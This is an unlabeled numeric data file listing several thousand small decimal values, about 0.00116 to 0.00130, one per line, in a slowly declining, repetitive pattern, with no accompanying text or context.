0.00129441
0.00128987
0.00128565
0.0012899
0.00128571
0.0012899
0.00128567
0.00128984
0.00128987
0.00128565
0.0012899
0.0012857
0.0012899
0.00128567
0.00128984
0.00127236
0.00127687
0.00127236
0.00127687
0.00127686
0.00128114
0.00128114
0.00128115
0.00127686
0.00127686
0.00127233
0.00126816
0.00127236
0.0012681
0.00127235
0.0012723
0.00126813
0.00127233
0.00126816
0.00127236
0.00126811
0.00127236
0.0012723
0.00126813
0.0012769
0.00128113
0.00128106
0.00127687
0.0012811
0.00127688
0.00127693
0.0012769
0.00128113
0.00128106
0.00127688
0.0012811
0.00127688
0.00127693
0.00127237
0.00126809
0.00126809
0.00127237
0.00127237
0.00126809
0.00128991
0.00128989
0.00128564
0.00128565
0.00128991
0.00128989
0.00128564
0.00129441
0.00129868
0.00129442
0.00129868
0.00129441
0.00129441
0.00129443
0.00129868
0.00129867
0.00129441
0.00129868
0.00129442
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00127687
0.00128114
0.00128112
0.00127689
0.00128114
0.00127687
0.00127688
0.00127237
0.00127236
0.0012681
0.0012681
0.00127237
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127235
0.0012681
0.00126811
0.0012681
0.00127237
0.00127236
0.00127687
0.00128114
0.00128112
0.00127689
0.00128114
0.00127687
0.00127688
0.00127237
0.00127236
0.00126809
0.00127237
0.0012681
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127235
0.0012681
0.00126811
0.00127237
0.00127235
0.0012681
0.00128992
0.00128563
0.00128564
0.00128991
0.00128991
0.00128563
0.00129444
0.00129861
0.00129867
0.00129442
0.00129442
0.00129864
0.00129448
0.00129445
0.00129861
0.00129867
0.00129442
0.00129448
0.00129864
0.00129442
0.0012944
0.00129869
0.00129869
0.00129441
0.00129869
0.00129441
0.00128987
0.00128565
0.0012899
0.00128571
0.0012899
0.00128984
0.00128567
0.00128987
0.00128565
0.0012899
0.00128571
0.00128984
0.0012899
0.00128567
0.00129442
0.00128991
0.00127236
0.00127687
0.00127686
0.00128114
0.00128114
0.00128114
0.00127687
0.00127687
0.00127233
0.00126817
0.00127236
0.00126811
0.0012723
0.00127236
0.00126813
0.00127233
0.00126817
0.00127236
0.00126811
0.00127236
0.0012723
0.00126813
0.00127691
0.00128113
0.00128106
0.00127688
0.00127694
0.0012811
0.00127688
0.00127691
0.00128113
0.00128107
0.00127688
0.0012811
0.00127688
0.00127694
0.00127237
0.00126809
0.00126809
0.00127237
0.00127237
0.00126809
0.00127236
0.00127687
0.00128991
0.00128989
0.00128564
0.00128565
0.00128991
0.0012899
0.00128564
0.00129441
0.00129868
0.00129442
0.00129868
0.00129441
0.00129441
0.00129443
0.00129868
0.00129866
0.00129441
0.00129868
0.00129442
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00127687
0.00128112
0.00128114
0.00127689
0.00128114
0.00127689
0.00127688
0.00127237
0.00127236
0.0012681
0.0012681
0.00127237
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127236
0.00126811
0.0012681
0.0012681
0.00127236
0.00127237
0.00127687
0.00128114
0.00128113
0.00127689
0.00128114
0.00127688
0.00127689
0.00127238
0.00127236
0.0012681
0.00127237
0.0012681
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127238
0.00127235
0.0012681
0.00126812
0.00127237
0.00127236
0.00126811
0.00128991
0.00128989
0.00128566
0.00128564
0.0012899
0.00128991
0.00128564
0.00129441
0.00129868
0.00129442
0.00129441
0.00129869
0.00129441
0.00129443
0.00129866
0.00129868
0.00129442
0.00129868
0.00129442
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00128991
0.00128989
0.00128564
0.00128565
0.00128991
0.0012899
0.00128564
0.00129441
0.00129868
0.00129442
0.00129868
0.00129441
0.00129441
0.00129443
0.00129868
0.00129867
0.00129868
0.00129441
0.00129442
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00127687
0.00128112
0.00128114
0.00127689
0.00128114
0.00127688
0.00127687
0.00127237
0.00127236
0.0012681
0.00127237
0.0012681
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127235
0.00126811
0.0012681
0.00127236
0.00127237
0.0012681
0.00127687
0.00128114
0.00128112
0.00127689
0.00128114
0.00127687
0.00127688
0.00127237
0.00127235
0.0012681
0.00127237
0.0012681
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127235
0.0012681
0.00126811
0.00127237
0.00127235
0.00126809
0.00128992
0.00128564
0.00128564
0.00128992
0.00128991
0.00128563
0.00129445
0.00129861
0.00129868
0.00129442
0.00129442
0.00129865
0.00129448
0.00129445
0.00129861
0.00129867
0.00129442
0.00129448
0.00129865
0.00129442
0.00129441
0.00129869
0.00129869
0.00129441
0.00129869
0.00129441
0.00128987
0.00128565
0.0012899
0.00128571
0.0012899
0.00128984
0.00128568
0.00128987
0.00128565
0.0012899
0.00128571
0.00128984
0.0012899
0.00128567
0.00129442
0.0012899
0.00127237
0.00127688
0.00127686
0.00128114
0.00128114
0.00128115
0.00127687
0.00127686
0.00127233
0.00126817
0.00127236
0.00126811
0.0012723
0.00127236
0.00126813
0.00127233
0.00126816
0.00127236
0.00126811
0.00127236
0.0012723
0.00126813
0.00127691
0.00128113
0.00128107
0.00127688
0.00127694
0.0012811
0.00127688
0.0012769
0.00128113
0.00128106
0.00127687
0.0012811
0.00127688
0.00127694
0.00127238
0.00126809
0.00126809
0.00127237
0.00127237
0.00126809
0.00127236
0.00127687
0.00128991
0.0012899
0.00128565
0.00128564
0.0012899
0.00128991
0.00128564
0.00129442
0.00129869
0.00129442
0.00129441
0.00129869
0.00129442
0.00129443
0.00129867
0.00129869
0.00129443
0.00129869
0.00129442
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00128992
0.0012899
0.00128565
0.00128564
0.0012899
0.00128991
0.00128564
0.00129442
0.00129868
0.00129442
0.00129869
0.00129441
0.00129442
0.00129443
0.00129867
0.00129869
0.00129869
0.00129443
0.00129442
0.00128992
0.00128564
0.0012899
0.00128991
0.00128564
0.00127687
0.00128112
0.00128114
0.00127689
0.00128114
0.00127688
0.00127687
0.00127237
0.00127236
0.0012681
0.00127237
0.0012681
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127235
0.00126811
0.0012681
0.00127235
0.00127237
0.0012681
0.00127687
0.00128112
0.00128114
0.00127689
0.00128114
0.00127688
0.00127687
0.00127237
0.00127236
0.0012681
0.00127237
0.0012681
0.00127687
0.00128114
0.00127688
0.00128114
0.00127687
0.00127237
0.00127235
0.00126811
0.0012681
0.00127235
0.00127237
0.0012681
0.00129441
0.0012899
0.00129442
0.00128991
0.00127686
0.00128114
0.00128114
0.00128114
0.00127686
0.00127686
0.00127233
0.00126817
0.00127236
0.00126811
0.00126813
0.0012723
0.00127236
0.00127233
0.00126817
0.00127236
0.00126811
0.00126813
0.0012723
0.00127236
0.0012769
0.00128113
0.00128106
0.00127687
0.0012811
0.00127694
0.00127688
0.0012769
0.00128113
0.00128106
0.00127688
0.0012811
0.00127694
0.00127688
0.00127238
0.00126809
0.00126809
0.00126809
0.00127237
0.00127237
0.00127236
0.00127687
0.00127236
0.00127687
0.00125933
0.00125482
0.00125933
0.00125482
0.00125483
0.00125055
0.00125055
0.00125482
0.00125482
0.00125054
0.00125936
0.00126352
0.00126358
0.00125933
0.00126356
0.00125933
0.00125939
0.00125936
0.00126352
0.00126358
0.00125933
0.00126356
0.00125933
0.00125939
0.00125931
0.0012636
0.0012636
0.0012636
0.00125932
0.00125932
0.00125478
0.00125056
0.00125481
0.00125062
0.00125481
0.00125058
0.00125475
0.00125478
0.00125056
0.00125481
0.00125062
0.00125481
0.00125058
0.00125475
0.00123727
0.00124178
0.00123727
0.00124178
0.00124177
0.00124605
0.00124606
0.00124606
0.00124178
0.00124178
0.00123724
0.00123308
0.00123727
0.00123302
0.00123727
0.00123721
0.00123304
0.00123724
0.00123307
0.00123727
0.00123302
0.00123727
0.00123721
0.00123304
0.00124182
0.00124604
0.00124598
0.00124179
0.00124602
0.00124179
0.00124185
0.00124182
0.00124604
0.00124598
0.00124179
0.00124602
0.00124179
0.00124185
0.00123729
0.001233
0.001233
0.00123728
0.00123728
0.001233
0.00125482
0.0012548
0.00125055
0.00125057
0.00125482
0.00125481
0.00125055
0.00125932
0.00126359
0.00125933
0.00126359
0.00125932
0.00125932
0.00125934
0.00126359
0.00126358
0.00125933
0.0012636
0.00125934
0.00125482
0.00125055
0.00125481
0.00125482
0.00125055
0.00124178
0.00124605
0.00124603
0.0012418
0.00124605
0.00124178
0.00124179
0.00123728
0.00123727
0.00123301
0.00123301
0.00123728
0.00124178
0.00124605
0.00124179
0.00124605
0.00124178
0.00123728
0.00123726
0.00123301
0.00123302
0.00123301
0.00123728
0.00123726
0.00124178
0.00124605
0.00124603
0.0012418
0.00124605
0.00124178
0.00124179
0.00123728
0.00123727
0.00123301
0.00123728
0.00123301
0.00124178
0.00124605
0.00124179
0.00124605
0.00124178
0.00123728
0.00123726
0.00123301
0.00123302
0.00123728
0.00123726
0.00123301
0.00125483
0.00125055
0.00125055
0.00125483
0.00125483
0.00125054
0.00125936
0.00126352
0.00126358
0.00125933
0.00125933
0.00126356
0.00125939
0.00125936
0.00126353
0.00126359
0.00125933
0.00125939
0.00126356
0.00125933
0.00125932
0.0012636
0.0012636
0.00125932
0.0012636
0.00125932
0.00125478
0.00125056
0.00125481
0.00125062
0.00125481
0.00125475
0.00125059
0.00125478
0.00125056
0.00125481
0.00125062
0.00125475
0.00125481
0.00125059
0.00125933
0.00125482
0.00123727
0.00124178
0.00124177
0.00124605
0.00124605
0.00124606
0.00124178
0.00124178
0.00123724
0.00123307
0.00123727
0.00123301
0.0012372
0.00123727
0.00123304
0.00123724
0.00123307
0.00123727
0.00123301
0.00123727
0.0012372
0.00123304
0.00124182
0.00124604
0.00124598
0.00124179
0.00124185
0.00124601
0.00124179
0.00124182
0.00124604
0.00124598
0.00124179
0.00124601
0.00124179
0.00124185
0.00123728
0.001233
0.001233
0.00123728
0.00123728
0.001233
0.00123727
0.00124178
0.00125483
0.00125481
0.00125056
0.00125057
0.00125483
0.00125481
0.00125056
0.00125933
0.0012636
0.00125934
0.0012636
0.00125933
0.00125933
0.00125935
0.0012636
0.00126358
0.00125933
0.0012636
0.00125934
0.00125483
0.00125055
0.00125482
0.00125483
0.00125055
0.00124178
0.00124603
0.00124605
0.0012418
0.00124605
0.00124179
0.00124178
0.00123728
0.00123727
0.001233
0.001233
0.00123727
0.00124178
0.00124605
0.00124179
0.00124605
0.00124178
0.00123727
0.00123726
0.00123302
0.00123301
0.001233
0.00123726
0.00123727
0.00124178
0.00124605
0.00124603
0.0012418
0.00124605
0.00124178
0.00124179
0.00123728
0.00123726
0.001233
0.00123727
0.001233
0.00124178
0.00124605
0.00124179
0.00124605
0.00124178
0.00123728
0.00123726
0.00123301
0.00123302
0.00123727
0.00123726
0.001233
0.00125482
0.0012548
0.00125057
0.00125055
0.00125481
0.00125482
0.00125055
0.00125933
0.0012636
0.00125933
0.00125933
0.0012636
0.00125933
0.00125934
0.00126358
0.00126359
0.00125934
0.0012636
0.00125933
0.00125482
0.00125055
0.00125481
0.00125482
0.00125055
0.00125482
0.0012548
0.00125055
0.00125056
0.00125482
0.00125481
0.00125055
0.00125932
0.00126359
0.00125933
0.0012636
0.00125932
0.00125932
0.00125934
0.00126359
0.00126358
0.00126359
0.00125933
0.00125934
0.00125482
0.00125055
0.00125481
0.00125482
0.00125055
0.00124178
0.00124603
0.00124605
0.00124179
0.00124605
0.00124179
0.00124178
0.00123728
0.00123727
0.001233
0.00123728
0.00123301
0.00124178
0.00124605
0.00124179
0.00124605
0.00124178
0.00123728
0.00123726
0.00123302
0.00123301
0.00123726
0.00123728
0.00123301
0.00124178
0.00124605
0.00124603
0.00124179
0.00124605
0.00124178
0.00124179
0.00123728
0.00123727
0.001233
0.00123728
0.00123301
0.00124178
0.00124605
0.00124178
0.00124605
0.00124178
0.00123728
0.00123725
0.00123301
0.00123302
0.00123727
0.00123726
0.00123301
0.00125483
0.00125055
0.00125055
0.00125483
0.00125482
0.00125054
0.00125936
0.00126352
0.00126359
0.00125933
0.00125934
0.00126356
0.00125939
0.00125936
0.00126352
0.00126358
0.00125933
0.00125939
0.00126356
0.00125933
0.00125932
0.0012636
0.0012636
0.00125932
0.0012636
0.00125932
0.00125478
0.00125056
0.00125482
0.00125062
0.00125481
0.00125475
0.00125058
0.00125478
0.00125056
0.00125481
0.00125062
0.00125475
0.00125481
0.00125058
0.00125933
0.00125482
0.00123727
0.00124178
0.00124177
0.00124605
0.00124605
0.00124605
0.00124177
0.00124177
0.00123724
0.00123307
0.00123727
0.00123301
0.00123721
0.00123726
0.00123304
0.00123724
0.00123307
0.00123727
0.00123301
0.00123726
0.00123721
0.00123304
0.00124181
0.00124604
0.00124597
0.00124178
0.00124185
0.00124601
0.00124179
0.00124181
0.00124604
0.00124597
0.00124178
0.00124601
0.00124179
0.00124184
0.00123728
0.001233
0.001233
0.00123728
0.00123728
0.00123299
0.00123727
0.00124178
0.00125482
0.0012548
0.00125056
0.00125055
0.00125481
0.00125482
0.00125055
0.00125932
0.00126359
0.00125933
0.00125932
0.0012636
0.00125932
0.00125934
0.00126358
0.0012636
0.00125934
0.0012636
0.00125933
0.00125482
0.00125055
0.00125481
0.00125482
0.00125055
0.00125482
0.00125481
0.00125056
0.00125055
0.00125481
0.00125482
0.00125055
0.00125933
0.0012636
0.00125933
0.0012636
0.00125932
0.00125933
0.00125934
0.00126358
0.0012636
0.0012636
0.00125934
0.00125933
0.00125482
0.00125055
0.00125481
0.00125482
0.00125055
0.00124178
0.00124603
0.00124605
0.00124179
0.00124605
0.00124179
0.00124178
0.00123728
0.00123726
0.001233
0.00123728
0.001233
0.00124178
0.00124605
0.00124178
0.00124605
0.00124178
0.00123728
0.00123726
0.00123302
0.00123301
0.00123726
0.00123727
0.00123301
0.00124178
0.00124603
0.00124605
0.00124179
0.00124605
0.00124179
0.00124178
0.00123728
0.00123726
0.001233
0.00123727
0.001233
0.00124178
0.00124605
0.00124178
0.00124605
0.00124178
0.00123728
0.00123726
0.00123302
0.00123301
0.00123726
0.00123727
0.001233
0.00125933
0.00125482
0.00125933
0.00125482
0.00124177
0.00124605
0.00124605
0.00124605
0.00124177
0.00124177
0.00123724
0.00123307
0.00123727
0.00123301
0.00123304
0.0012372
0.00123726
0.00123724
0.00123307
0.00123726
0.00123301
0.00123303
0.0012372
0.00123726
0.00124181
0.00124604
0.00124597
0.00124178
0.00124601
0.00124184
0.00124178
0.00124181
0.00124604
0.00124597
0.00124178
0.00124601
0.00124184
0.00124178
0.00123728
0.001233
0.001233
0.00123299
0.00123728
0.00123728
0.00123727
0.00124178
0.00123727
0.00124178
0.00122424
0.00121973
0.00122424
0.00121973
0.00121974
0.00121545
0.00121546
0.00121973
0.00121973
0.00121545
0.00122427
0.00122843
0.0012285
0.00122424
0.00122847
0.00122424
0.0012243
0.00122427
0.00122843
0.00122849
0.00122424
0.00122847
0.00122424
0.0012243
0.00122423
0.00122851
0.00122851
0.00122851
0.00122423
0.00122423
0.00121969
0.00121547
0.00121972
0.00121552
0.00121972
0.00121549
0.00121966
0.00121969
0.00121547
0.00121972
0.00121552
0.00121972
0.00121549
0.00121966
0.00120217
0.00120669
0.00120217
0.00120669
0.00120667
0.00121096
0.00121096
0.00121096
0.00120668
0.00120668
0.00120214
0.00119797
0.00120217
0.00119792
0.00120217
0.00120211
0.00119794
0.00120214
0.00119797
0.00120217
0.00119792
0.00120217
0.00120211
0.00119794
0.00120672
0.00121095
0.00121088
0.00120669
0.00121092
0.00120669
0.00120675
0.00120672
0.00121095
0.00121088
0.00120669
0.00121092
0.00120669
0.00120675
0.00120219
0.0011979
0.0011979
0.00120218
0.00120218
0.0011979
0.00121973
0.00121971
0.00121546
0.00121547
0.00121973
0.00121971
0.00121545
0.00122423
0.0012285
0.00122424
0.0012285
0.00122423
0.00122423
0.00122425
0.0012285
0.00122849
0.00122423
0.0012285
0.00122424
0.00121973
0.00121546
0.00121972
0.00121973
0.00121546
0.00120668
0.00121095
0.00121094
0.0012067
0.00121096
0.00120668
0.0012067
0.00120218
0.00120217
0.00119791
0.00119791
0.00120218
0.00120668
0.00121096
0.00120669
0.00121096
0.00120668
0.00120218
0.00120216
0.00119791
0.00119792
0.00119791
0.00120218
0.00120216
0.00120668
0.00121095
0.00121093
0.00120669
0.00121095
0.00120668
0.00120669
0.00120218
0.00120217
0.0011979
0.00120218
0.00119791
0.00120668
0.00121095
0.00120669
0.00121095
0.00120668
0.00120218
0.00120216
0.00119791
0.00119792
0.00120218
0.00120216
0.00119791
0.00121973
0.00121545
0.00121545
0.00121973
0.00121973
0.00121545
0.00122426
0.00122843
0.00122849
0.00122424
0.00122424
0.00122846
0.00122429
0.00122426
0.00122843
0.00122849
0.00122424
0.00122429
0.00122846
0.00122424
0.00122422
0.0012285
0.0012285
0.00122422
0.00122851
0.00122422
0.00121969
0.00121546
0.00121972
0.00121552
0.00121971
0.00121966
0.00121549
0.00121969
0.00121546
0.00121972
0.00121552
0.00121966
0.00121971
0.00121549
0.00122423
0.00121972
0.00120217
0.00120668
0.00120667
0.00121096
0.00121096
0.00121096
0.00120668
0.00120668
0.00120214
0.00119797
0.00120217
0.00119791
0.00120211
0.00120217
0.00119794
0.00120214
0.00119797
0.00120217
0.00119791
0.00120217
0.00120211
0.00119794
0.00120672
0.00121094
0.00121088
0.00120669
0.00120675
0.00121092
0.00120669
0.00120672
0.00121094
0.00121088
0.00120669
0.00121092
0.00120669
0.00120675
0.00120219
0.0011979
0.0011979
0.00120218
0.00120218
0.0011979
0.00120217
0.00120668
0.00121973
0.00121971
0.00121546
0.00121547
0.00121973
0.00121972
0.00121546
0.00122423
0.0012285
0.00122424
0.0012285
0.00122423
0.00122423
0.00122425
0.0012285
0.00122849
0.00122423
0.0012285
0.00122425
0.00121973
0.00121546
0.00121972
0.00121973
0.00121546
0.00120668
0.00121094
0.00121095
0.0012067
0.00121096
0.0012067
0.00120668
0.00120218
0.00120217
0.00119791
0.00119791
0.00120218
0.00120669
0.00121096
0.00120669
0.00121096
0.00120668
0.00120218
0.00120216
0.00119792
0.00119791
0.00119791
0.00120217
0.00120218
0.00120668
0.00121095
0.00121094
0.0012067
0.00121095
0.00120668
0.00120669
0.00120218
0.00120217
0.00119791
0.00120218
0.00119791
0.00120668
0.00121095
0.00120669
0.00121095
0.00120668
0.00120218
0.00120216
0.00119791
0.00119792
0.00120218
0.00120216
0.00119791
0.00121973
0.00121971
0.00121547
0.00121546
0.00121971
0.00121973
0.00121545
0.00122423
0.0012285
0.00122424
0.00122423
0.0012285
0.00122423
0.00122425
0.00122848
0.0012285
0.00122424
0.0012285
0.00122423
0.00121973
0.00121545
0.00121971
0.00121973
0.00121545
0.00121973
0.00121971
0.00121546
0.00121547
0.00121973
0.00121972
0.00121546
0.00122423
0.0012285
0.00122424
0.00122851
0.00122423
0.00122423
0.00122425
0.0012285
0.00122849
0.0012285
0.00122423
0.00122425
0.00121973
0.00121546
0.00121972
0.00121973
0.00121546
0.00120668
0.00121093
0.00121095
0.00120669
0.00121095
0.00120669
0.00120668
0.00120218
0.00120216
0.0011979
0.00120217
0.00119791
0.00120668
0.00121095
0.00120669
0.00121095
0.00120667
0.00120218
0.00120216
0.00119792
0.00119791
0.00120216
0.00120218
0.00119791
0.00120668
0.00121095
0.00121094
0.00120669
0.00121096
0.00120668
0.00120669
0.00120218
0.00120217
0.0011979
0.00120218
0.00119791
0.00120668
0.00121095
0.00120669
0.00121096
0.00120668
0.00120218
0.00120216
0.00119791
0.00119792
0.00120218
0.00120216
0.00119791
0.00121973
0.00121545
0.00121545
0.00121973
0.00121973
0.00121545
0.00122427
0.00122843
0.00122849
0.00122424
0.00122424
0.00122846
0.00122429
0.00122427
0.00122843
0.00122849
0.00122424
0.00122429
0.00122847
0.00122424
0.00122422
0.00122851
0.00122851
0.00122423
0.00122851
0.00122423
0.00121969
0.00121547
0.00121972
0.00121552
0.00121972
0.00121966
0.00121549
0.00121969
0.00121546
0.00121972
0.00121552
0.00121966
0.00121972
0.00121549
0.00122423
0.00121972
0.00120217
0.00120669
0.00120667
0.00121096
0.00121096
0.00121096
0.00120668
0.00120668
0.00120214
0.00119797
0.00120217
0.00119792
0.00120211
0.00120217
0.00119794
0.00120214
0.00119797
0.00120217
0.00119792
0.00120217
0.00120211
0.00119794
0.00120672
0.00121094
0.00121088
0.00120669
0.00120675
0.00121092
0.00120669
0.00120672
0.00121094
0.00121088
0.00120669
0.00121092
0.00120669
0.00120675
0.00120219
0.0011979
0.0011979
0.00120218
0.00120218
0.0011979
0.00120218
0.00120669
0.00121973
0.00121971
0.00121547
0.00121546
0.00121971
0.00121973
0.00121546
0.00122423
0.0012285
0.00122424
0.00122423
0.0012285
0.00122423
0.00122425
0.00122848
0.0012285
0.00122424
0.0012285
0.00122423
0.00121973
0.00121545
0.00121971
0.00121972
0.00121546
0.00121973
0.00121971
0.00121547
0.00121546
0.00121971
0.00121972
0.00121545
0.00122423
0.0012285
0.00122424
0.0012285
0.00122423
0.00122423
0.00122424
0.00122848
0.0012285
0.0012285
0.00122424
0.00122423
0.00121973
0.00121545
0.00121971
0.00121972
0.00121545
0.00120668
0.00121094
0.00121095
0.0012067
0.00121095
0.0012067
0.00120668
0.00120218
0.00120217
0.00119791
0.00120218
0.00119791
0.00120668
0.00121095
0.00120669
0.00121095
0.00120668
0.00120218
0.00120216
0.00119792
0.00119791
0.00120217
0.00120218
0.00119791
0.00120668
0.00121093
0.00121095
0.0012067
0.00121095
0.00120669
0.00120668
0.00120218
0.00120217
0.00119791
0.00120218
0.00119791
0.00120668
0.00121095
0.00120669
0.00121095
0.00120668
0.00120218
0.00120216
0.00119792
0.00119791
0.00120216
0.00120218
0.00119791
0.00122423
0.00121972
0.00122423
0.00121972
0.00120667
0.00121096
0.00121096
0.00121096
0.00120668
0.00120668
0.00120214
0.00119797
0.00120217
0.00119791
0.00119794
0.00120211
0.00120217
0.00120214
0.00119797
0.00120217
0.00119792
0.00119794
0.00120211
0.00120217
0.00120672
0.00121094
0.00121088
0.00120669
0.00121092
0.00120675
0.00120669
0.00120671
0.00121094
0.00121087
0.00120669
0.00121091
0.00120674
0.00120669
0.00120218
0.0011979
0.0011979
0.0011979
0.00120218
0.00120218
0.00120217
0.00120668
0.00120217
0.00120668
0.00118913
0.00118462
0.00118914
0.00118462
0.00118463
0.00118035
0.00118035
0.00118463
0.00118463
0.00118035
0.00118916
0.00119333
0.00119339
0.00118913
0.00119336
0.00118914
0.00118919
0.00118916
0.00119333
0.00119339
0.00118914
0.00119337
0.00118914
0.0011892
0.00118912
0.00119341
0.00119341
0.00119341
0.00118913
0.00118913
0.00118459
0.00118036
0.00118462
0.00118042
0.00118462
0.00118039
0.00118455
0.00118459
0.00118036
0.00118462
0.00118042
0.00118462
0.00118039
0.00118456
0.00116707
0.00117158
0.00116707
0.00117158
0.00117157
0.00117586
0.00117586
0.00117586
0.00117157
0.00117158
0.00116704
0.00116287
0.00116707
0.00116281
0.00116706
0.001167
0.00116284
0.00116704
0.00116287
0.00116707
0.00116281
0.00116706
0.00116701
0.00116284
0.00117162
0.00117584
0.00117578
0.00117159
0.00117582
0.00117159
0.00117164
0.00117162
0.00117584
0.00117578
0.00117159
0.00117582
0.00117159
0.00117165
0.00116708
0.0011628
0.0011628
0.00116708
0.00116708
0.00116279
0.00118463
0.00118461
0.00118036
0.00118037
0.00118463
0.00118461
0.00118036
0.00118913
0.0011934
0.00118914
0.0011934
0.00118913
0.00118913
0.00118915
0.0011934
0.00119339
0.00118913
0.0011934
0.00118914
0.00118463
0.00118035
0.00118462
0.00118463
0.00118036
0.00117158
0.00117585
0.00117584
0.0011716
0.00117585
0.00117158
0.00117159
0.00116708
0.00116706
0.0011628
0.0011628
0.00116707
0.00117158
0.00117585
0.00117159
0.00117585
0.00117158
0.00116708
0.00116706
0.0011628
0.00116281
0.0011628
0.00116707
0.00116706
0.00117158
0.00117585
0.00117584
0.0011716
0.00117585
0.00117158
0.0011716
0.00116708
0.00116706
0.0011628
0.00116707
0.0011628
0.00117158
0.00117585
0.00117159
0.00117585
0.00117158
0.00116708
0.00116706
0.0011628
0.00116282
0.00116707
0.00116706
0.0011628
0.00118463
0.00118035
0.00118035
0.00118463
0.00118463
0.00118035
0.00118916
0.00119333
0.00119339
0.00118914
0.00118914
0.00119336
0.0011892
0.00118916
0.00119333
0.00119339
0.00118913
0.00118919
0.00119336
0.00118914
0.00118912
0.0011934
0.0011934
0.00118912
0.00119341
0.00118912
0.00118459
0.00118037
0.00118462
0.00118042
0.00118462
0.00118456
0.00118039
0.00118459
0.00118036
0.00118461
0.00118042
0.00118456
0.00118461
0.00118039
0.00118913
0.00118462
0.00116707
0.00117158
0.00117157
0.00117586
0.00117586
0.00117586
0.00117158
0.00117158
0.00116704
0.00116287
0.00116707
0.00116281
0.001167
0.00116706
0.00116283
0.00116704
0.00116287
0.00116707
0.00116281
0.00116707
0.001167
0.00116283
0.00117161
0.00117584
0.00117578
0.00117159
0.00117165
0.00117582
0.00117159
0.00117161
0.00117584
0.00117578
0.00117159
0.00117581
0.00117159
0.00117164
0.00116708
0.0011628
0.0011628
0.00116708
0.00116708
0.00116279
0.00116707
0.00117158
0.00118463
0.00118461
0.00118036
0.00118037
0.00118463
0.00118461
0.00118036
0.00118913
0.0011934
0.00118914
0.00119341
0.00118913
0.00118913
0.00118915
0.00119341
0.00119339
0.00118913
0.0011934
0.00118915
0.00118463
0.00118036
0.00118462
0.00118463
0.00118036
0.00117158
0.00117584
0.00117585
0.0011716
0.00117585
0.0011716
0.00117158
0.00116708
0.00116707
0.0011628
0.0011628
0.00116708
0.00117158
0.00117585
0.00117159
0.00117585
0.00117158
0.00116708
0.00116706
0.00116282
0.00116281
0.0011628
0.00116706
0.00116708
0.00117158
0.00117585
0.00117584
0.0011716
0.00117585
0.00117158
0.0011716
0.00116708
0.00116707
0.00116281
0.00116708
0.00116281
0.00117158
0.00117585
0.00117159
0.00117585
0.00117158
0.00116708
0.00116706
0.00116281
0.00116282
0.00116708
0.00116706
0.00116281
0.00118463
0.00118461
0.00118037
0.00118036
0.00118461
0.00118463
0.00118035
0.00118913
0.0011934
0.00118913
0.00118913
0.0011934
0.00118913
0.00118915
0.00119339
0.0011934
0.00118915
0.0011934
0.00118913
0.00118463
0.00118035
0.00118461
0.00118463
0.00118035
0.00118463
0.00118461
0.00118036
0.00118037
0.00118463
0.00118462
0.00118036
0.00118913
0.0011934
0.00118914
0.0011934
0.00118913
0.00118913
0.00118915
0.00119341
0.00119339
0.00119341
0.00118913
0.00118915
0.00118463
0.00118036
0.00118462
0.00118463
0.00118036
0.00117158
0.00117583
0.00117585
0.00117159
0.00117585
0.00117159
0.00117158
0.00116708
0.00116706
0.0011628
0.00116708
0.0011628
0.00117158
0.00117585
0.00117159
0.00117585
0.00117158
0.00116708
0.00116706
0.00116282
0.00116281
0.00116706
0.00116707
0.0011628
0.00117158
0.00117585
0.00117584
0.00117159
0.00117585
0.00117158
0.00117159
0.00116708
0.00116707
0.0011628
0.00116708
0.00116281
0.00117158
0.00117585
0.00117159
0.00117585
0.00117158
0.00116708
0.00116706
0.00116281
0.00116282
0.00116708
0.00116706
0.00116281
0.00118464
0.00118035
0.00118035
0.00118463
0.00118463
0.00118035
0.00118917
0.00119333
0.0011934
0.00118914
0.00118914
0.00119337
0.0011892
0.00118917
0.00119333
0.0011934
0.00118914
0.0011892
0.00119337
0.00118914
0.00118912
0.00119341
0.00119341
0.00118913
0.00119341
0.00118913
0.00118459
0.00118037
0.00118462
0.00118043
0.00118462
0.00118456
0.00118039
0.0011846
0.00118037
0.00118463
0.00118043
0.00118456
0.00118462
0.00118039
0.00118914
0.00118463
0.00116707
0.00117159
0.00117158
0.00117586
0.00117586
0.00117586
0.00117158
0.00117158
0.00116704
0.00116287
0.00116707
0.00116281
0.00116701
0.00116707
0.00116284
0.00116704
0.00116287
0.00116707
0.00116281
0.00116707
0.00116701
0.00116284
0.00117162
0.00117585
0.00117578
0.00117159
0.00117165
0.00117582
0.00117159
0.00117162
0.00117585
0.00117578
0.00117159
0.00117582
0.00117159
0.00117165
0.00116709
0.0011628
0.0011628
0.00116708
0.00116708
0.0011628
0.00116707
0.00117159
0.00118463
0.00118461
0.00118037
0.00118036
0.00118462
0.00118463
0.00118036
0.00118913
0.0011934
0.00118914
0.00118913
0.00119341
0.00118913
0.00118915
0.00119339
0.0011934
0.00118915
0.0011934
0.00118914
0.00118463
0.00118036
0.00118462
0.00118463
0.00118036
0.00118463
0.00118461
0.00118037
0.00118036
0.00118462
0.00118463
0.00118036
0.00118913
0.0011934
0.00118914
0.00119341
0.00118913
0.00118913
0.00118915
0.00119338
0.0011934
0.0011934
0.00118915
0.00118914
0.00118463
0.00118036
0.00118462
0.00118463
0.00118036
0.00117158
0.00117584
0.00117585
0.0011716
0.00117586
0.0011716
0.00117159
0.00116708
0.00116707
0.00116281
0.00116708
0.00116281
0.00117159
0.00117586
0.00117159
0.00117586
0.00117159
0.00116708
0.00116706
0.00116282
0.00116281
0.00116707
0.00116708
0.00116281
0.00117158
0.00117584
0.00117585
0.0011716
0.00117586
0.0011716
0.00117158
0.00116708
0.00116707
0.00116281
0.00116708
0.00116281
0.00117158
0.00117585
0.00117159
0.00117586
0.00117158
0.00116708
0.00116707
0.00116282
0.00116281
0.00116707
0.00116708
0.00116281
0.00118914
0.00118462
0.00118914
0.00118462
0.00117157
